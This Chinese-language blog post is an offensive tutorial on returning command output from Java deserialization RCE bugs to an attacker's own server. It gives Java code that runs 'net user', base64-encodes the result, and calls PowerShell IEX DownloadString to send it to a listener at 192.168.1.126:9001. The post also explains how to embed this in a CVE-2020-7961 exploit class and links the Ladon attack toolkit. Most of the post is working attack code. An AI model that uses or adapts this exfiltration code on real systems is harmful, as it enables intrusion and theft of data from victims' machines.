<%
Visit
%>
简介
在JAVA反序列化漏洞中,可能会有一些漏洞无法直接回显,这时我们可能需外带,通过WEB、FTP、DNS等外带,但是我不喜欢把自己的结果传到别人的网站上,本文教大家如何把结果回显到自己的VPS上,本文主要是JAVA代码,其它命令执行漏洞同理。
启动WEB
Ladon web 9001
JAVA执行命令
javac main.java & java main
注意:get提交换行符需换成别的字符
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
| import java.io.BufferedReader; import java.io.InputStreamReader; public class main { public static void main(String[] args) {
Runtime runtime = Runtime.getRuntime(); try { BufferedReader br = new BufferedReader(new InputStreamReader(runtime.exec("net user").getInputStream())); String line=null; StringBuffer b=new StringBuffer(); while ((line=br.readLine())!=null) { b.append(line+" "); } System.out.println(b.toString()); String[] cmd = {"cmd.exe", "/c", "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.126:9001/getstr/",b.toString(),"')"};
//java.lang.Runtime.getRuntime().exec(cmd).waitFor(); java.lang.Runtime.getRuntime().exec(cmd); } catch (Exception e) { e.printStackTrace(); }
} }
|
![使用http访问查看图片]()
返回多行结果
只返回whoami结果没什么问题,但是多行无法提交,原因在换行符这里 所以不要换行符
返回结果 K8飞刀 8.0之前 URL编码(UTF8)解码 下一版本Ladon需做下解析处理或POST提交
![使用http访问查看图片]()
BASE64提交
http://192.168.1.126:9001/getbase64 提交的结果BASE64加密
http://192.168.1.126:9001/debase64 提交的base64结果解密
注意提交不要包含空格,以免Ladon无法解密
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38
| //main.java import java.io.BufferedReader; import java.io.InputStreamReader; import java.util.Base64.Encoder; import java.util.Base64;//jdk 1.8 public class main { public static void main(String[] args) { Runtime runtime = Runtime.getRuntime(); try { BufferedReader br = new BufferedReader(new InputStreamReader(runtime.exec("net user").getInputStream())); String line=null; StringBuffer b=new StringBuffer(); while ((line=br.readLine())!=null) { b.append(line+" "); } System.out.println(b.toString()); Encoder encoder = Base64.getEncoder(); byte[] encode = encoder.encode(b.toString().getBytes()); String encodeStr = new String(encode); System.out.println(encodeStr); //String[] cmd = {"cmd.exe", "/c", "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.126:9001/getstr/",b.toString(),"')"}; String[] cmd = {"cmd.exe", "/c", "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.126:9001/debase64/",encodeStr,"')"};
//java.lang.Runtime.getRuntime().exec(cmd).waitFor(); java.lang.Runtime.getRuntime().exec(cmd); } catch (Exception e) { e.printStackTrace(); } } }
|
这样写会多出一个空格
String[] cmd = {“cmd.exe”, “/c”, “powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.126:9001/debase64/“,encodeStr,”’)”};
![使用http访问查看图片]()
这样写就没有空格
String[] cmd = {“cmd.exe”, “/c”, “powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.126:9001/debase64/“+encodeStr,”’)”};
![使用http访问查看图片]()
解决中文乱码
提交的base64结果使用UTF-8编码
Encoder encoder = Base64.getEncoder();
//byte[] encode = encoder.encode("hello".getBytes("UTF-8"));
byte[] encode = encoder.encode(b.toString().getBytes("UTF-8"));
String encodeStr = new String(encode);
System.out.println(encodeStr);
![使用http访问查看图片]()
完美回显
由于是BASE64加密提交的,所以什么符号都可以,这样我们可以把换行加上去,得到完美回显
其它漏洞回显解决方案同理,包括不仅限于WEB漏洞,本文只是用JAVA的反序列漏洞做例子
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37
| //main.java import java.io.BufferedReader; import java.io.InputStreamReader; import java.util.Base64.Encoder; import java.util.Base64;//jdk 1.8 public class main { public static void main(String[] args) { Runtime runtime = Runtime.getRuntime(); try { BufferedReader br = new BufferedReader(new InputStreamReader(runtime.exec("net user").getInputStream())); String line=null; StringBuffer b=new StringBuffer(); while ((line=br.readLine())!=null) { b.append(line+"\n"); } System.out.println(b.toString()); Encoder encoder = Base64.getEncoder(); byte[] encode = encoder.encode(b.toString().getBytes()); String encodeStr = new String(encode); System.out.println(encodeStr);
String[] cmd = {"cmd.exe", "/c", "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.126:9001/debase64/"+encodeStr,"')"};
//java.lang.Runtime.getRuntime().exec(cmd).waitFor(); java.lang.Runtime.getRuntime().exec(cmd); } catch (Exception e) { e.printStackTrace(); } } }
|
将以上代码稍微修改一下集成到以下POC里,如CVE-2020-7961 RCE漏洞,编译成class
1 2 3 4 5 6 7 8 9 10 11 12
| //LifExp.java public class LifExp { static { try { String[] cmd = {"cmd.exe", "/c", "calc.exe"}; java.lang.Runtime.getRuntime(). exec(cmd).waitFor(); } catch ( Exception e ) { e.printStackTrace(); } } }
|
![使用http访问查看图片]()
Download
LadonGo (ALL OS)
https://github.com/k8gege/LadonGo/releases
Ladon (Windows & Cobalt Strike)
历史版本: https://github.com/k8gege/Ladon/releases
7.0版本:http://k8gege.org/Download
8.0版本:K8小密圈
转载声明
K8博客文章随意转载,转载请注明出处! © K8gege http://k8gege.org